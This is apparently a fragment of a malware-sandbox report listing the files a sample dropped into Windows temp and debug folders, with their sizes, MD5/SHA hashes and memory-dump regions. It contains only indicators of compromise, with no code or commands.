96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\e47e9ff1-56bc-4075-91da-f8a43830d8df.vbs

Filesize
496B

MD5
d5748e8c78448ea4c96fa5dcdd159870

SHA1
a4c3b95d1bbcb5cd7f0563cf7877168c3d553fce

SHA256
01f8dd191c26ba411d7377919d50b24ebf62ab9c46181c69ff3fb3f01ad32384

SHA512
423120880856aca70dd2a2b26459aabfa07690edfce3d8bc213185fa64ad8ac66c8044130ccba82fe7d992de2cbe7a7fa4b862b3d8805fb11d32f80bdd8fb3f4

Download Submit
C:\Windows\debug\DebugTracker.exe

Filesize
942KB

MD5
22cbb5402a44f058c9176e04aa74b5f6

SHA1
10838c4611974ba2a5382442677dcf679840ecdd

SHA256
5d1930426e5e41548bcc214c4298c96028ea71d2a83f755e50fa5756c35a615a

SHA512
10d0693f4c6ff9cbcdf5b4ec8b0c690f11d9463c834c94fc7659bf9a89edae9c0b951e55f5909344caf4cccc1ea8d7635b58126cb3667847a290b4f0ac49f0a0

Download Submit
C:\Windows\debug\PXm40rAQJNL1dLLc2xrFc0EDNV.bat

Filesize
35B

MD5
159dec09c9bf063b00e4952d8665a601

SHA1
38bac5d19ebd3822e23b07932cd65ba7c2c08a9c

SHA256
f380d068932fe95e35273007cae8acc6d71bd62446c7fa7f0ed0da6bcb7b0c9c

SHA512
5cb79038ee2f712aead2b6180af25305326044711d9f8270b4075eabe7635c096eb8c4e22182633d639abf29293d28a7187d5c8bb5726cd6a9707b48961df073

Download Submit
C:\Windows\debug\VUQLBafFd1oU7p3k.vbe

Filesize
217B

MD5
f9ed37928a0d95692faa9f69d0cd5cb7

SHA1
77c2968f3d2ba8afb128307105861734b4fce286

SHA256
61ac997d454ae62b6025b60e2ac9f1c7031cf380f3d9d1395de3cd816d35554a

SHA512
cbe7954def42abac38dde5ba9f9fbc341e8e9161a9b0826e9fe779541fdf2b0057402d9c3dab608a9b01dc9c3229a122e13ac71bd52be978adbd628d16867b79

Download Submit
C:\Windows\debug\cs2.exe

Filesize
137KB

MD5
509f2eeba11a964fa8d22ab6994cee78

SHA1
544321089bbc1cbc6e51eabcfcb0c042f797142c

SHA256
21c7ecd4074b68a2d59b6b241037392a0f1ee2d6450fa3c72a3895f3563d5a2a

SHA512
f6eed65466977ef5b775e9dd1c204790b901e64bebc648e71b38062dd5d9207cc53fbfa4bf7b170dfc1fa41bfb1570cb6527863d9abe5d03efc49eedc5487cf0

Download Submit
C:\Windows\debug\wtf.exe

Filesize
265KB

MD5
47ba0b9187c62981c229372477e2b2a0

SHA1
9c861ee21eb30ec6aa35b02bd437f70c2ac25eee

SHA256
93a0a5f1d487c699ba0809428c732bb0d741bc41b4459490b24d9b03ee3183fc

SHA512
2a65a3b52751ce99918ab3e01db1cc21e08e5a5069fd0256a6601a3aee5d2d75ce842c9eeb147cd7d76612b0ab8f86adee2eab3fea8e410f55c8061a690585c7

Download Submit
C:\Windows\debug\wtf1.exe

Filesize
229KB

MD5
187795687849f43176bc94aff323435f

SHA1
22e3d510df771291a2a256946ac6268ccf5d10be

SHA256
d7ebf40f863050be539cd8cbba2463c48235aa509819ed3b066a1c0b4974203e

SHA512
b099c9cbd3f5d9cd44dae19c66e88d32e5c290fa3f8cd6818397b54f2f73d318738d96b295053254bed4f254a2ebdfb2a8e75402e61314343060447888d781a3

Download Submit
memory/236-155-0x0000000002D20000-0x0000000002D2E000-memory.dmp

Filesize
56KB

Download
memory/236-154-0x0000000002D10000-0x0000000002D1A000-memory.dmp

Filesize
40KB

Download
memory/236-156-0x0000000002DE0000-0x0000000002DE8000-memory.dmp

Filesize
32KB

Download
memory/236-153-0x0000000000B30000-0x0000000000C22000-memory.dmp

Filesize
968KB

Download
memory/3356-68-0x000002A3F3CF0000-0x000002A3F3D18000-memory.dmp

Filesize
160KB

Download
memory/3992-69-0x0000015D10D30000-0x0000015D10D52000-memory.dmp

Filesize
136KB

Download
memory/4000-62-0x00000110BF650000-0x00000110BF696000-memory.dmp

Filesize
280KB

Download
memory/4928-232-0x000000001D500000-0x000000001D50D000-memory.dmp

Filesize
52KB

Download
memory/4928-231-0x000000001CC90000-0x000000001CCD6000-memory.dmp

Filesize
280KB

Download
memory/4928-234-0x000000001D530000-0x000000001D53B000-memory.dmp

Filesize
44KB

Download
memory/4928-233-0x000000001D510000-0x000000001D52E000-memory.dmp

Filesize
120KB

Download
memory/5016-92-0x0000016FEFAB0000-0x0000016FEFB26000-memory.dmp

Filesize
472KB

Download
memory/5016-93-0x0000016FEFA30000-0x0000016FEFA80000-memory.dmp

Filesize
320KB

Download
memory/5016-94-0x0000016FEF8B0000-0x0000016FEF8CE000-memory.dmp

Filesize
120KB

Download
memory/5016-130-0x0000016FEFA80000-0x0000016FEFA92000-memory.dmp

Filesize
72KB

Download
memory/5016-63-0x0000016FED280000-0x0000016FED2C0000-memory.dmp

Filesize
256KB

Download
memory/5016-129-0x0000016FEF8F0000-0x0000016FEF8FA000-memory.dmp

Filesize
40KB

Download